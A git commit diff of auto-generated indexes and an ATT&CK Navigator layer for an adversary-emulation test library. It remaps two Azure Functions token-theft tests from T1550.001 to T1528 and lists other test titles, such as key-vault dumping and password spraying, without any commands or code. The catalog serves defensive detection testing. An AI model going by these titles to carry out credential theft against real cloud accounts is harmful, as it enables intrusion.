Generated docs from job=generate-docs branch=master [ci skip]

2025-07-09 23:32:12 +00:00
parent c33c235b53
commit b149dc4549
25 changed files with 772 additions and 949 deletions
@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":2,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n- Azure - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Storage Account Objects via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1550","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.001","score":2,"enabled":true,"comment":"\n- Azure - Functions code upload - Functions code injection via Blob upload\n- Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.001/T1550.001.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.006","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.006/T1555.006.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- Azure - Create Snapshot from Managed Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1619","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- Azure - Enumerate Azure Blobs with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
+{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":2,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n- Azure - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":2,"enabled":true,"comment":"\n- Azure - Functions code upload - Functions code injection via Blob upload\n- Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Storage Account Objects via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.006","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.006/T1555.006.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- Azure - Create Snapshot from Managed Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1619","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- Azure - Enumerate Azure Blobs with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
@@ -11,14 +11,14 @@ defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,10,GCP - Delete Ac
 defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,1,AWS - Create Snapshot from EBS Volume,a3c09662-85bb-4ea8-b15b-6dc8a844e236,sh
 defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,2,Azure - Create Snapshot from Managed Disk,89e69b4b-3458-4ec6-b819-b3008debc1bc,sh
 defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,3,GCP - Create Snapshot from Persistent Disk,e6fbc036-91e7-4ad3-b9cb-f7210f40dd5d,sh
-defense-evasion,T1550.001,Use Alternate Authentication Material: Application Access Token,1,Azure - Functions code upload - Functions code injection via Blob upload,9a5352e4-56e5-45c2-9b3f-41a46d3b3a43,powershell
-defense-evasion,T1550.001,Use Alternate Authentication Material: Application Access Token,2,Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token,67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1,powershell
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
 credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,2,Azure - Dump Azure Instance Metadata from Virtual Machines,cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7,powershell
 credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
 credential-access,T1110.003,Brute Force: Password Spraying,9,AWS - Password Spray an AWS using GoAWSConsoleSpray,9c10d16b-20b1-403a-8e67-50ef7117ed4e,sh
+credential-access,T1528,Steal Application Access Token,1,Azure - Functions code upload - Functions code injection via Blob upload,9a5352e4-56e5-45c2-9b3f-41a46d3b3a43,powershell
+credential-access,T1528,Steal Application Access Token,2,Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token,67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1,powershell
 credential-access,T1555.006,Credentials from Password Stores: Cloud Secrets Management Stores,1,Azure - Dump All Azure Key Vaults with Microburst,1b83cddb-eaa7-45aa-98a5-85fb0a8807ea,powershell
 impact,T1485,Data Destruction,4,GCP - Delete Bucket,4ac71389-40f4-448a-b73f-754346b3f928,sh
 discovery,T1580,Cloud Infrastructure Discovery,1,AWS - EC2 Enumeration from Cloud Instance,99ee161b-dcb1-4276-8ecb-7cfdcb207820,sh
@@ -53,7 +53,5 @@ collection,T1530,Data from Cloud Storage Object,2,Azure - Dump Azure Storage Acc
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
-lateral-movement,T1550.001,Use Alternate Authentication Material: Application Access Token,1,Azure - Functions code upload - Functions code injection via Blob upload,9a5352e4-56e5-45c2-9b3f-41a46d3b3a43,powershell
-lateral-movement,T1550.001,Use Alternate Authentication Material: Application Access Token,2,Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token,67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1,powershell
 execution,T1651,Cloud Administration Command,1,AWS Run Command (and Control),a3cc9c95-c160-4b86-af6f-84fba87bfd30,powershell
 execution,T1648,Serverless Execution,1,Lambda Function Hijack,87a4a141-c2bb-49d1-a604-8679082d8b91,powershell
@@ -642,8 +642,6 @@ defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,10,Create
 defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,1,AWS - Create Snapshot from EBS Volume,a3c09662-85bb-4ea8-b15b-6dc8a844e236,sh
 defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,2,Azure - Create Snapshot from Managed Disk,89e69b4b-3458-4ec6-b819-b3008debc1bc,sh
 defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,3,GCP - Create Snapshot from Persistent Disk,e6fbc036-91e7-4ad3-b9cb-f7210f40dd5d,sh
-defense-evasion,T1550.001,Use Alternate Authentication Material: Application Access Token,1,Azure - Functions code upload - Functions code injection via Blob upload,9a5352e4-56e5-45c2-9b3f-41a46d3b3a43,powershell
-defense-evasion,T1550.001,Use Alternate Authentication Material: Application Access Token,2,Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token,67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1,powershell
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
@@ -1616,8 +1614,6 @@ lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,1,RDP to Dom
 lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,2,Changing RDP Port to Non Standard Port via Powershell,2f840dd4-8a2e-4f44-beb3-6b2399ea3771,powershell
 lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,3,Changing RDP Port to Non Standard Port via Command_Prompt,74ace21e-a31c-4f7d-b540-53e4eb6d1f73,command_prompt
 lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,4,Disable NLA for RDP via Command Prompt,01d1c6c0-faf0-408e-b368-752a02285cb2,command_prompt
-lateral-movement,T1550.001,Use Alternate Authentication Material: Application Access Token,1,Azure - Functions code upload - Functions code injection via Blob upload,9a5352e4-56e5-45c2-9b3f-41a46d3b3a43,powershell
-lateral-movement,T1550.001,Use Alternate Authentication Material: Application Access Token,2,Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token,67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1,powershell
 credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
 credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
 credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
@@ -1782,6 +1778,8 @@ credential-access,T1552.001,Unsecured Credentials: Credentials In Files,14,List
 credential-access,T1552.001,Unsecured Credentials: Credentials In Files,15,Find Azure credentials,a8f6148d-478a-4f43-bc62-5efee9f931a4,sh
 credential-access,T1552.001,Unsecured Credentials: Credentials In Files,16,Find GCP credentials,aa12eb29-2dbb-414e-8b20-33d34af93543,sh
 credential-access,T1552.001,Unsecured Credentials: Credentials In Files,17,Find OCI credentials,9d9c22c9-fa97-4008-a204-478cf68c40af,sh
+credential-access,T1528,Steal Application Access Token,1,Azure - Functions code upload - Functions code injection via Blob upload,9a5352e4-56e5-45c2-9b3f-41a46d3b3a43,powershell
+credential-access,T1528,Steal Application Access Token,2,Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token,67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1,powershell
 credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
 credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
 credential-access,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
@@ -45,7 +45,7 @@
 - T1556.009 Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Use Alternate Authentication Material: Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

@@ -107,7 +107,7 @@
 # lateral-movement
 - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1021.007 Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Use Alternate Authentication Material: Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

 # execution
 - T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -44,7 +44,7 @@
 - T1562.008 Impair Defenses: Disable Cloud Logs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1672 Email Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Use Alternate Authentication Material: Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -65,7 +65,7 @@
 - T1021.007 Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Use Alternate Authentication Material: Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

 # initial-access
 - T1566.002 Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -837,9 +837,7 @@
  - Atomic Test #1: AWS - Create Snapshot from EBS Volume [iaas:aws]
  - Atomic Test #2: Azure - Create Snapshot from Managed Disk [iaas:azure]
  - Atomic Test #3: GCP - Create Snapshot from Persistent Disk [iaas:gcp]
- [T1550.001 Use Alternate Authentication Material: Application Access Token](../../T1550.001/T1550.001.md)
-  - Atomic Test #1: Azure - Functions code upload - Functions code injection via Blob upload [iaas:azure]
-  - Atomic Test #2: Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token [iaas:azure]
+- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
@@ -2223,9 +2221,7 @@
  - Atomic Test #2: Changing RDP Port to Non Standard Port via Powershell [windows]
  - Atomic Test #3: Changing RDP Port to Non Standard Port via Command_Prompt [windows]
  - Atomic Test #4: Disable NLA for RDP via Command Prompt [windows]
- [T1550.001 Use Alternate Authentication Material: Application Access Token](../../T1550.001/T1550.001.md)
-  - Atomic Test #1: Azure - Functions code upload - Functions code injection via Blob upload [iaas:azure]
-  - Atomic Test #2: Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token [iaas:azure]
+- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

 # credential-access
 - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2430,7 +2426,9 @@
  - Atomic Test #16: Find GCP credentials [macos, linux]
  - Atomic Test #17: Find OCI credentials [macos, linux]
 - T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1528 Steal Application Access Token](../../T1528/T1528.md)
+  - Atomic Test #1: Azure - Functions code upload - Functions code injection via Blob upload [iaas:azure]
+  - Atomic Test #2: Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token [iaas:azure]
 - [T1552.006 Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md)
  - Atomic Test #1: GPP Passwords (findstr) [windows]
  - Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
@@ -49,7 +49,7 @@
  - Atomic Test #9: Office 365 - Set Audit Bypass For a Mailbox [office-365]
 - T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1672 Email Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Use Alternate Authentication Material: Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

@@ -69,7 +69,7 @@
 - T1021.007 Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Use Alternate Authentication Material: Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

 # initial-access
 - T1566.002 Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -23,7 +23,7 @@
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Exec Into Container](../../T1609/T1609.md) | [Office Application Startup](../../T1137/T1137.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | Additional Container Cluster Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Infrastructure Discovery](../../T1580/T1580.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | [Archive Collected Data](../../T1560/T1560.md) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Wi-Fi Networks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
-|  | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL](../../T1574.001/T1574.001.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Virtual Machine Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Use Alternate Authentication Material: Application Access Token](../../T1550.001/T1550.001.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
+|  | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL](../../T1574.001/T1574.001.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Virtual Machine Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
